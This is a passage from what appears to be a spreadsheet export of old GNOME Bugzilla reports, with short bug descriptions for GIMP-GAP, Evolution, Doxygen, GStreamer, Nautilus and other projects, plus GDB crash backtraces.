    long_name = 0x8055c60 hal-udi short_name = 104 'h' flags = 0 arg = G_OPTION_ARG_STRING arg_data = 0x8059868 description = 0x8055c68 Mount by HAL UDI 
    arg_description = 0x0} {long_name = 0x8055637 device short_name = 100 'd' flags = 0 arg = G_OPTION_ARG_STRING arg_data = 0x8059864 
    description = 0x8055c79 Mount by device file arg_description = 0x0} {long_name = 0x8055c8e pseudonym short_name = 112 'p' flags = 0 arg = G_OPTION_ARG_STRING 
    arg_data = 0x8059860 description = 0x8057588 Mount by one of device's nicknames: mountpoint label with or without directory prefix arg_description = 0x0} {
    long_name = 0x8055a93 text short_name = 116 't' flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x8059830 description = 0x8055c98 Text-based operation 
    arg_description = 0x0} {long_name = 0x8055684 mount-point short_name = 109 'm' flags = 0 arg = G_OPTION_ARG_STRING arg_data = 0x805985c 
    description = 0x8055cad Specify mount point arg_description = 0x0} {long_name = 0x805569b mount-options short_name = 111 'o' flags = 0 arg = G_OPTION_ARG_STRING 
    arg_data = 0x8059858 description = 0x8055cc1 Specify mount options arg_description = 0x0} {long_name = 0x8055cd7 extra-mount-options short_name = 0 '\0' flags = 0 
    arg = G_OPTION_ARG_STRING arg_data = 0x8059854 description = 0x8055ceb Specify extra mount options arg_description = 0x0} {long_name = 0x8055692 fstype 
    short_name = 102 'f' flags = 0 arg = G_OPTION_ARG_STRING arg_data = 0x8059850 description = 0x8055d07 Specify file system type arg_description = 0x0} {
    long_name = 0x8055d20 write-settings short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x805984c 
    description = 0x80575e0 Don't mount write given settings for volume/drive arg_description = 0x0} {long_name = 0x8055d2f display-settings short_name = 0 '\0' 
    flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x8059848 description = 0x8057614 Don't mount display settings for volume/drive arg_description = 0x0} {
    long_name = 0x8055d40 erase-settings short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x8059844 
    description = 0x8057644 Don't mount erase settings for volume/drive arg_description = 0x0} {long_name = 0x0 short_name = 0 '\0' flags = 0 arg = G_OPTION_ARG_NONE 
    arg_data = 0x0 description = 0x0 arg_description = 0x0}}
#10 0xb7858ebc in ?? ()
#11 0x00000001 in ?? ()
#12 0xbfceceb4 in ?? ()
#13 0xbfcecec0 in ?? ()
#14 0xb7f20898 in ?? ()
#15 0x00000000 in ?? ()
...</t>
  </si>
  <si>
    <t>GIMP-GAP-169046</t>
  </si>
  <si>
    <t>filter all layers</t>
  </si>
  <si>
    <t>GIMP-GAP</t>
  </si>
  <si>
    <t>plug-in-gauss-rle2</t>
  </si>
  <si>
    <t>Version details: 2.0.2
Distribution/Version: XP
The error ocurs when using filter all layers function and the
plug-in-gauss-rle2 and after entering the data for the first layer. It is
supposed to apear a dialog box asking for the data for the last frame which
doesn't happen. The error goes no stored data found for Key plug-in-gauss-rle2. 
I'm running GIMP 2.2.3 for Windows and GIM-GAP 2.0.2.</t>
  </si>
  <si>
    <t>hof</t>
  </si>
  <si>
    <t>clef16</t>
  </si>
  <si>
    <t>DOXYGEN-348537</t>
  </si>
  <si>
    <t>Reopening unnamed namespace produces internal inconsistency</t>
  </si>
  <si>
    <t>Please describe the problem:
If an item in an unnamed namespace is defined out-of-line *and* the definition occurs once the unnamed namespace has been reopened doxygen complains of an internal inconsistency.
Steps to reproduce:
Test case forthcoming.
Actual results:
Expected results:
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>braden</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-367715</t>
  </si>
  <si>
    <t>[doc] Update doc to mention saving of memory registers.</t>
  </si>
  <si>
    <t>gcalctool now saves/restores the ten memory register values as gconf resources.
The documentation should be updated to reflect this.
(Originally filed as bug #168694).</t>
  </si>
  <si>
    <t>EVOLUTION-234626</t>
  </si>
  <si>
    <t>writing mail</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.8
Synopsis: writing mail
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
when i tried to write a new message i got this advise:
It was not possible to criate de editor  window
It was not possible activate the HTML editor component
The sistem activation error is:
Nothing have corresponded  to the requirements
Unknown reporter: djalmir@hotmail.com changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>djalmir</t>
  </si>
  <si>
    <t>GNOME-SESSION-503278</t>
  </si>
  <si>
    <t>Set appropriate gnome-keyring-daemon environment variables</t>
  </si>
  <si>
    <t>On my desktop the ssh agent is not used
the SSH_AGENT_PID variable is set on the /usr/bin/ssh-agent /usr/bin/gnome-session pid and the SSH_AUTH_SOCK use the ssh one rather than the gnome-keyring</t>
  </si>
  <si>
    <t>EVOLUTION-231434</t>
  </si>
  <si>
    <t>Only sending email to first three addresses on contact list</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
I'm using Evolution 1.1.1 on Mandrake 8.2. I just created a new contact
list with 10 addresses in it. I can save it and open it and edit it: all
the addresses are in there. However if I try and send a message to it
only the first three addresses on the list are used. Right clicking on
the list name in the To: field in the message composer only shows the
first three address and clicking edit pops up a list editor with only
three addresses in it. Sending the message and then typing mailq reveals
the message sitting in the outgoing spool indeed addressed to only the
first three addresses. When I click on Contacts and look at the Contact
List in there only the first three addresses are shown. Double-clicking
on it opens it and reveals all 10 addresses.
Steps to reproduce the problem:
1. Create a contact list with more than 4 addresses
2. Create a new mail message and select contact list as to address
3. Send message
Actual Results:
Message only sent to first three messages on list
Expected Results:
Message should be sent to all addresses on contact list
How often does this happen? 
Always
Additional Information:
All the addresses are saved in the contact list. You can open it and edit
it. If in the contact list editor you select Actions -&gt; Send Message to
List ... a composer window open with ALL the addresses in it. It is only if
you first create a new message and then add the contact list name to the
To: field that the message is only sent to the first three addresses.</t>
  </si>
  <si>
    <t>darren</t>
  </si>
  <si>
    <t>GNOMEMM-129816</t>
  </si>
  <si>
    <t>libgnomecanvasmm</t>
  </si>
  <si>
    <t>spec file dependency fix</t>
  </si>
  <si>
    <t>This fixes the dependency to gtkmm2 instead of gtkmm.</t>
  </si>
  <si>
    <t>GSTREAMER-515985</t>
  </si>
  <si>
    <t>[ximagesrc] regression when using damage</t>
  </si>
  <si>
    <t>Slomo &amp; I both get the following trying to use ximagesrc:
gst-launch-0.10 ximagesrc ! ffmpegcolorspace ! fakesink
Setting pipeline to PAUSED ...
Pipeline is live and does not need PREROLL ...
Setting pipeline to PLAYING ...
New clock: GstSystemClock
X Error of failed request:  176
  Major opcode of failed request:  158 (DAMAGE)
  Minor opcode of failed request:  3 (XDamageSubtract)
  Serial number of failed request:  30
  Current serial number in output stream:  31
This works for me with the previous -good release.</t>
  </si>
  <si>
    <t>NAUTILUS-131531</t>
  </si>
  <si>
    <t>[obsolete] nautilus-media</t>
  </si>
  <si>
    <t>Cannot drag / drop files from audio view</t>
  </si>
  <si>
    <t>Forwarded from the Debian Bug Tracking System see:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=227556
Originally reported by Johan Walles  on Tue 13 Jan
2004 21:52:00 +0100
Package: nautilus-media
Version: 0.3.3.1-1
Severity: normal
Try this:
Open a directory with sound files.
Tell Nautilus to view as audio.
Select tree in Nautilus' left-hand pane.
Try dragging one of the sound files to somewhere else in the tree.
Expected result:
The file should move from the current directory to where I dragged it.
Current result:
Nothing happens when I try to drag a file.  The mouse pointer doesn't 
change (to indicate a drag operation is in progress) and the file 
doesn't move.  Right-clicking files doesn't have any effect either.
-- System Information:
Debian Release: testing/unstable
Architecture: i386
Kernel: Linux foo 2.4.20-3-686 #1 Sun May 18 20:26:19 EST 2003 i686
Locale: LANG=sv_SE LC_CTYPE=sv_SE</t>
  </si>
  <si>
    <t>jorohr</t>
  </si>
  <si>
    <t>LIBGNOMEDB-64400</t>
  </si>
  <si>
    <t>New form-oriented widgets</t>
  </si>
  <si>
    <t>A set of form-oriented widgets (GnomeDbEntry GnomeDbDateEntry
GnomeDbLabel GnomeDbCombo etc) must be added along with a top-level
widget (GnomeDbDataForm?) to control all of them.
All of them should be using GdaDataModel's so that the GnomeDbDataForm
widget will bind each of the columns in the data model to each of the
widgets. This top-level widget should have all facilities for navigating
through the data model making searches etc.</t>
  </si>
  <si>
    <t>GNOME-UTILS-394465</t>
  </si>
  <si>
    <t>gnome-system-log lost stored logs then rotation</t>
  </si>
  <si>
    <t>Please describe the problem:
Subj silently lost log file from configuration then it cant be load on program start. Configuration entrys for logs regularly lost in the rotation.
Steps to reproduce:
1. close gnome-system-log 
2. delete some watched log by root
3. open gnome-system-log OUUUPPSSSS!
Actual results:
Expected results:
Does this happen every time?
Other information:
simple check must be done by window refreshing:
if (we have some log inf configuration) and (it cant be load) then
 show some message in viewer window: log are empty or deleted</t>
  </si>
  <si>
    <t>m_maniac</t>
  </si>
  <si>
    <t>WEBSITE-150047</t>
  </si>
  <si>
    <t>Links on g.o/learn are broken</t>
  </si>
  <si>
    <t>The users guides on http://www.gnome.org/learn/ are unobtainable all the links
under GNOME User's Guide for Gnome 2.6 go to 404. This means that there are no
user guides available!</t>
  </si>
  <si>
    <t>website-maint</t>
  </si>
  <si>
    <t>sil-gnome</t>
  </si>
  <si>
    <t>GIMP-166650</t>
  </si>
  <si>
    <t>Error in python plug-ins</t>
  </si>
  <si>
    <t>Start a Gimp which includes python-fu. Execute Xtns/Python-Fu/Test/Sphere.
(Probably opening another image is also OK). Now close the image such that no
images are open. The menu Xtns/Python-Fu/Test/Sphereis now grayed out as are the
Python-Fu Console and PDB Browser.
The solution is simple: In sphere.py gimpcons.py and pdbbrowse.py change the
8th parameter from RGB* GRAY* INDEXED* or * to the empty string .</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-461439</t>
  </si>
  <si>
    <t>fonts rendering settings are not honored until gnome-settings-deamon is restarted</t>
  </si>
  <si>
    <t>If I change a parameter for font rendering in gnome 2.19.5 ( the change is not applied until I kill gnome-settings-daemon.
I can't see errors from command line when I laucnh gnome-appearance-properties.</t>
  </si>
  <si>
    <t>baptistem</t>
  </si>
  <si>
    <t>EVOLUTION-257644</t>
  </si>
  <si>
    <t>crash removing calender sources</t>
  </si>
  <si>
    <t>Distribution: SuSE Linux 9.0 (i586)
Package: Evolution
Priority: Critical
Version: GNOME2.6. 1.5.7
Gnome-Distributor: GNOME.Org
Synopsis: crash removing calender sources
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Bugzilla-Version: 1.5.7
BugBuddy-GnomeVersion: 2.0 (2.6.0)
Description:
I have 5 calendar sources 4 local 1 a remote webcal URI
Wanted to see the Gnome one in more detail so de-selected the other 4
sources bang :-)
I have:
evolution-data-server-0.0.92.1.0.200404260432-0.snap.ximian.8.1
evolution1.5-1.5.7.0.200404260432-0.snap.ximian.8.1
Debugging Information:
Backtrace was generated from '/opt/gnome/bin/evolution-1.5'
[New Thread 16384 (LWP 7325)]
[New Thread 32769 (LWP 7327)]
[New Thread 16386 (LWP 7328)]
[New Thread 294915 (LWP 7356)]
[New Thread 311300 (LWP 7357)]
[New Thread 327685 (LWP 7358)]
[New Thread 344070 (LWP 7359)]
[New Thread 360455 (LWP 7371)]
[New Thread 376840 (LWP 7420)]
[New Thread 393225 (LWP 7421)]
0x413e8ab6 in waitpid () from /lib/i686/libpthread.so.0
#0  0x413e8ab6 in waitpid () from /lib/i686/libpthread.so.0
#1  0x404805d8 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
#2  0x08064a91 in segv_redirect (sig=11) at main.c:455
#3  0x413e796c in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#4  
#5  0x4010c137 in e_cal_get_uri (ecal=0x83bf7d8) at e-cal.c:1874
#6  0x41da058c in ecm_get_color_for_component (model=0x8279288 
    comp_data=0x84bc638) at e-cal-model.c:923
#7  0x41da2a19 in e_cal_model_get_color_for_component (model=0x8279288
    comp_data=0x84bc638) at e-cal-model.c:1665
#8  0x41ddc346 in e_week_view_event_item_draw (canvas_item=0x8467298 
    drawable=0x83f7730 x=0 y=0 width=512 height=512)
    at e-week-view-event-item.c:380
#9  0x40f52f37 in gnome_canvas_group_draw (item=0x8279cd8
drawable=0x83f7730 
    x=0 y=0 width=512 height=512) at gnome-canvas.c:1686
#10 0x40f56194 in gnome_canvas_paint_rect (canvas=0x8279e60 x0=0 y0=0
    x1=512 y1=512) at gnome-canvas.c:2998
#11 0x40f563f0 in gnome_canvas_expose (widget=0x8279e60
event=0xbffff430)
    at gnome-canvas.c:3055
#12 0x410d6e9c in _gtk_marshal_BOOLEAN__BOXED (closure=0x8171688 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028 marshal_data=0x40f5622b) at
gtkmarshalers.c:82
#13 0x41565eee in g_type_class_meta_marshal (closure=0x8171688 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028 marshal_data=0xc8) at gclosure.c:514
#14 0x41565c34 in g_closure_invoke (closure=0x8171688 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028) at gclosure.c:437
#15 0x4157c136 in signal_emit_unlocked_R (node=0x8171870 detail=0 
    instance=0x8279e60 emission_return=0xbffff140 
    instance_and_params=0xbffff1c0) at gsignal.c:2474
#16 0x4157b12f in g_signal_emit_valist (instance=0x8279e60
signal_id=79 
    detail=0 var_args=0xbffff350 \200Ã³Ã¿Â¿Ãˆ) at gsignal.c:2205
#17 0x4157b3ff in g_signal_emit (instance=0x8279e60 signal_id=79
detail=0)
    at gsignal.c:2239
#18 0x411f3076 in gtk_widget_event_internal (widget=0x8279e60 
    event=0xbffff430) at gtkwidget.c:3563
#19 0x411f2d5b in gtk_widget_send_expose (widget=0x8279e60
event=0xbffff430)
    at gtkwidget.c:3403
#20 0x410d3d40 in gtk_main_do_event (event=0xbffff430) at
gtkmain.c:1545
#21 0x4146e76c in gdk_window_process_updates_internal
(window=0x837b5f8)
    at gdkwindow.c:2052
#22 0x4146e894 in gdk_window_process_all_updates () at gdkwindow.c:2099
#23 0x4146e8f7 in gdk_window_update_idle (data=0x0) at gdkwindow.c:2113
#24 0x415cc079 in g_idle_dispatch (source=0x83c86d0 
    callback=0x4146e8ca  user_data=0x0)
    at gmain.c:3750
#25 0x415c854d in g_main_dispatch (context=0x8094870) at gmain.c:1895
#26 0x415c98b9 in g_main_context_dispatch (context=0x8094870) at
gmain.c:2441
#27 0x415c9dec in g_main_context_iterate (context=0x8094870 block=1 
    dispatch=1 self=0x80752f0) at gmain.c:2522
#28 0x415ca643 in g_main_loop_run (loop=0x80fc998) at gmain.c:2726
#29 0x407c09ff in bonobo_main () at bonobo-main.c:297
#30 0x08064fc3 in main (argc=1 argv=0xbffff874) at main.c:605
Thread 10 (Thread 393225 (LWP 7421)):
#0  0x413e4b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x413e49d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x413e0e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x415b0d20 in g_async_queue_pop_intern_unlocked (queue=0xe530250
try=0 
    end_time=0x0) at gasyncqueue.c:226
	retval = 0x41628d58
#4  0x415b0ed4 in g_async_queue_pop (queue=0xe530250) at
gasyncqueue.c:266
	retval = 0xe6df7a8
#5  0x41b565a6 in worker (data=0x0) at e-book-async.c:25
	msg = (EBookMsg *) 0xe6df7a8
#6  0x415e608b in g_thread_create_proxy (data=0xe5a1cd0) at
gthread.c:559
	thread = (GRealThread *) 0xe5a1cd0
#7  0x413e1f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#8  0x41706327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 9 (Thread 376840 (LWP 7420)):
#0  0x416fdb66 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x415caaf1 in g_main_context_poll (context=0xe59eac8 timeout=-1 
    priority=2147483647 fds=0xe59b890 n_fds=1) at gmain.c:2824
	poll_func = 0x416fdb00 
#2  0x415c9dc1 in g_main_context_iterate (context=0xe59eac8 block=1 
    dispatch=1 self=0xe59efc8) at gmain.c:2517
	max_priority = 2147483647
	timeout = -1
	some_ready = 1
	nfds = 1
	allocated_nfds = 1
	fds = (GPollFD *) 0xe59b890
#3  0x415ca643 in g_main_loop_run (loop=0xe59eb50) at gmain.c:2726
	self = (GThread *) 0xe59efc8
#4  0x41b62658 in startup_mainloop (arg=0x0) at e-book.c:2357
	loop = (GMainLoop *) 0xe59eb50
#5  0x413e1f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41706327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 8 (Thread 360455 (LWP 7371)):
#0  0x413e4b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x413e49d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x413e0e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008c4aa in e_msgport_wait (mp=0xdcad128) at e-msgport.c:511
	_buffer = {__routine = 0x4008c212  
  __arg = 0xdcad128 __canceltype = 135685752 __prev = 0x0}
	msg = (EMsg *) 0x413e316f
#4  0x4008cdc2 in thread_dispatch (din=0xdcad4e0) at e-msgport.c:874
	e = (EThread *) 0xdcad4e0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 360455
#5  0x413e1f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41706327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 7 (Thread 344070 (LWP 7359)):
#0  0x413e4b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x413e49d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x413e0e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008c4aa in e_msgport_wait (mp=0x8141110) at e-msgport.c:511
	_buffer = {__routine = 0x4008c212  
  __arg = 0x8141110 __canceltype = 1145712180 __prev = 0x0}
	msg = (EMsg *) 0x413e316f
#4  0x4008cdc2 in thread_dispatch (din=0x8141560) at e-msgport.c:874
	e = (EThread *) 0x8141560
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 344070
#5  0x413e1f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41706327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 6 (Thread 327685 (LWP 7358)):
#0  0x413e4b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x413e49d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x413e0e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008c4aa in e_msgport_wait (mp=0x813f4a0) at e-msgport.c:511
	_buffer = {__routine = 0x4008c212  
  __arg = 0x813f4a0 __canceltype = 1133661748 __prev = 0x0}
	msg = (EMsg *) 0x413e316f
#4  0x4008cdc2 in thread_dispatch (din=0x813f448) at e-msgport.c:874
	e = (EThread *) 0x813f448
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x8a711a0
	self = 327685
#5  0x413e1f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41706327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 5 (Thread 311300 (LWP 7357)):
#0  0x413e4b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x413e49d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x413e0e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008c4aa in e_msgport_wait (mp=0x813f3c0) at e-msgport.c:511
	_buffer = {__routine = 0x4008c212  
  __arg = 0x813f3c0 __canceltype = 1125273140 __prev = 0x0}
	msg = (EMsg *) 0x413e316f
#4  0x4008cdc2 in thread_dispatch (din=0x813f368) at e-msgport.c:874
	e = (EThread *) 0x813f368
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 311300
#5  0x413e1f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41706327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 4 (Thread 294915 (LWP 7356)):
#0  0x413e4b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x413e49d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x413e0e90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008c4aa in e_msgport_wait (mp=0x813f4a0) at e-msgport.c:511
	_buffer = {__routine = 0x4008c212  
  __arg = 0x813f4a0 __canceltype = 1116884532 __prev = 0x0}
	msg = (EMsg *) 0x413e316f
#4  0x4008cdc2 in thread_dispatch (din=0x813f448) at e-msgport.c:874
	e = (EThread *) 0x813f448
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x868ccf0
	self = 294915
#5  0x413e1f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41706327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 3 (Thread 16386 (LWP 7328)):
#0  0x416fdb66 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x415caaf1 in g_main_context_poll (context=0x8293130 timeout=-1 
    priority=2147483647 fds=0x83f13e8 n_fds=9) at gmain.c:2824
	poll_func = 0x416fdb00 
#2  0x415c9dc1 in g_main_context_iterate (context=0x8293130 block=1 
    dispatch=1 self=0x809ed30) at gmain.c:2517
	max_priority = 2147483647
	timeout = -1
	some_ready = 1
	nfds = 9
	allocated_nfds = 10
	fds = (GPollFD *) 0x83f13e8
#3  0x415ca643 in g_main_loop_run (loop=0x8294098) at gmain.c:2726
	self = (GThread *) 0x809ed30
#4  0x409c17ee in link_io_thread_fn (data=0x0) at linc.c:343
No locals.
#5  0x415e608b in g_thread_create_proxy (data=0x809ed30) at
gthread.c:559
	thread = (GRealThread *) 0x809ed30
#6  0x413e1f60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#7  0x41706327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 2 (Thread 32769 (LWP 7327)):
#0  0x416fdb66 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x413e1a8e in __pthread_manager () from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x41706327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 1 (Thread 16384 (LWP 7325)):
#0  0x413e8ab6 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#1  0x404805d8 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
	estatus = 8
	eret = 136752168
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {8 8 1094607194 1098525180 136752176
3221219160 
      1098513143 134750904 136752168 8 1 0 136752168 1 22993315
8 
      136752168 134967072 134671040 0 138021176 0 1094607534
134750904 
      37783037 138021176 1094624908 138253568 1098230304 25
1094624908 
      138253568}} sa_flags = 1098230304 sa_restorer = 0xbfffe798}
	pid = 7710
#2  0x08064a91 in segv_redirect (sig=11) at main.c:455
No locals.
#3  0x413e796c in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#4  
No symbol table info available.
#5  0x4010c137 in e_cal_get_uri (ecal=0x83bf7d8) at e-cal.c:1874
	__inst = (GTypeInstance *) 0x83bf7d8
	__t = 136916728
	__r = 1
	priv = (ECalPrivate *) 0x821ebc0
#6  0x41da058c in ecm_get_color_for_component (model=0x8279288 
    comp_data=0x84bc638) at e-cal-model.c:923
	l = (GList *) 0xe7ccd30
	priv = (ECalModelPrivate *) 0x8279238
	i = 7
	first_empty = 6
	assigned_colors = {{color = 0x41e2f6cc #BECEDD uris = 0x0} {
    color = 0x41e2f6d4 #E2F0EF uris = 0x0} {color = 0x41e2f6dc
#C6E2B7 
    uris = 0x0} {color = 0x41e2f6e4 #E2F0D3 uris = 0x0} {
    color = 0x41e2f6ec #E2D4B7 uris = 0x0} {color = 0x41e2f6f4
#EAEAC1 
    uris = 0x0} {color = 0x41e2f6fc #F0B8B7 uris = 0x0} {
    color = 0x41e2f704 #FED4D3 uris = 0xe7ccd30} {
    color = 0x41e2f70c #E2C6E1 uris = 0x84196cc} {
    color = 0x41e2f714 #F0E2EF uris = 0x8419744}}
#7  0x41da2a19 in e_cal_model_get_color_for_component (model=0x8279288
    comp_data=0x84bc638) at e-cal-model.c:1665
	model_class = (ECalModelClass *) 0x8265018
	color = (const gchar *) 0x0
#8  0x41ddc346 in e_week_view_event_item_draw (canvas_item=0x8467298 
    drawable=0x83f7730 x=0 y=0 width=512 height=512)
    at e-week-view-event-item.c:380
	wveitem = (EWeekViewEventItem *) 0x8467298
	week_view = (EWeekView *) 0x8279458
	event = (EWeekViewEvent *) 0x848c970
	span = (EWeekViewEventSpan *) 0x843d874
	style = (GtkStyle *) 0x828b908
	gc = (GdkGC *) 0x837a4a0
	x1 = 280
	y1 = 25
	x2 = 419
	y2 = 50
	time_x = 27
	time_y = 27
	icon_x = 0
	icon_y = 27
	time_width = 84
	min_end_time_x = 5
	max_icon_x = 134
	rect_x = 282
	rect_w = 134
	rect_x2 = 136
	one_day_event = 0
	editing_span = 0
	start_hour = 0
	start_minute = 0
	end_hour = 24
	end_minute = 0
	draw_start = 1096977752
	draw_end = 1
	draw_start_triangle = 0
	draw_end_triangle = 1
	clip_rect = {x = 34 y = 1 width = 5 height = 1096511520}
	bg_color = {pixel = 65210 red = 65278 green = 54484 blue = 54227}
#9  0x40f52f37 in gnome_canvas_group_draw (item=0x8279cd8
drawable=0x83f7730 
    x=0 y=0 width=512 height=512) at gnome-canvas.c:1686
	group = (GnomeCanvasGroup *) 0x8279cd8
	list = (GList *) 0x8366c88
	child = (GnomeCanvasItem *) 0x8467298
#10 0x40f56194 in gnome_canvas_paint_rect (canvas=0x8279e60 x0=0 y0=0
    x1=512 y1=512) at gnome-canvas.c:2998
	widget = (GtkWidget *) 0x8279e60
	draw_x1 = 0
	draw_y1 = 0
	draw_x2 = 840
	draw_y2 = 792
	xblock = 512
	yblock = 512
	px = (guchar *) 0x0
	pixmap = (GdkPixmap *) 0x83f7730
#11 0x40f563f0 in gnome_canvas_expose (widget=0x8279e60
event=0xbffff430)
    at gnome-canvas.c:3055
	rect = {x0 = 0 y0 = 0 x1 = 840 y1 = 792}
	canvas = (GnomeCanvas *) 0x8279e60
	rects = (GdkRectangle *) 0x831ce78
	n_rects = 1
	i = 0
#12 0x410d6e9c in _gtk_marshal_BOOLEAN__BOXED (closure=0x8171688 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028 marshal_data=0x40f5622b) at
gtkmarshalers.c:82
	callback = 0x40f5622b 
	cc = (GCClosure *) 0x8171688
	data1 = 0x8279e60
	data2 = 0x80a00c8
	v_return = 136827096
#13 0x41565eee in g_type_class_meta_marshal (closure=0x8171688 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028 marshal_data=0xc8) at gclosure.c:514
	class = (GTypeClass *) 0x8204f88
	callback = 0x40f5622b
	offset = 200
#14 0x41565c34 in g_closure_invoke (closure=0x8171688 
    return_value=0xbfffeff0 n_param_values=2 param_values=0xbffff1c0
    invocation_hint=0xbffff028) at gclosure.c:437
	marshal = 0x41565e94 
	marshal_data = 0xc8
	in_marshal = 0
#15 0x4157c136 in signal_emit_unlocked_R (node=0x8171870 detail=0 
    instance=0x8279e60 emission_return=0xbffff140 
    instance_and_params=0xbffff1c0) at gsignal.c:2474
	accumulator = (SignalAccumulator *) 0x8171738
	emission = {next = 0x0 instance = 0x8279e60 ihint = {signal_id = 79
    detail = 0 run_type = G_SIGNAL_RUN_LAST} state = EMISSION_RUN 
  chain_type = 136408768}
	class_closure = (GClosure *) 0x8171688
	hlist = (HandlerList *) 0x0
	handler_list = (Handler *) 0x0
	return_accu = (GValue *) 0xbfffeff0
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 79
	max_sequential_handler_number = 34419
	return_value_altered = 0
#16 0x4157b12f in g_signal_emit_valist (instance=0x8279e60
signal_id=79 
    detail=0 var_args=0xbffff350 \200Ã³Ã¿Â¿Ãˆ) at gsignal.c:2205
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	error = (gchar *) 0x0
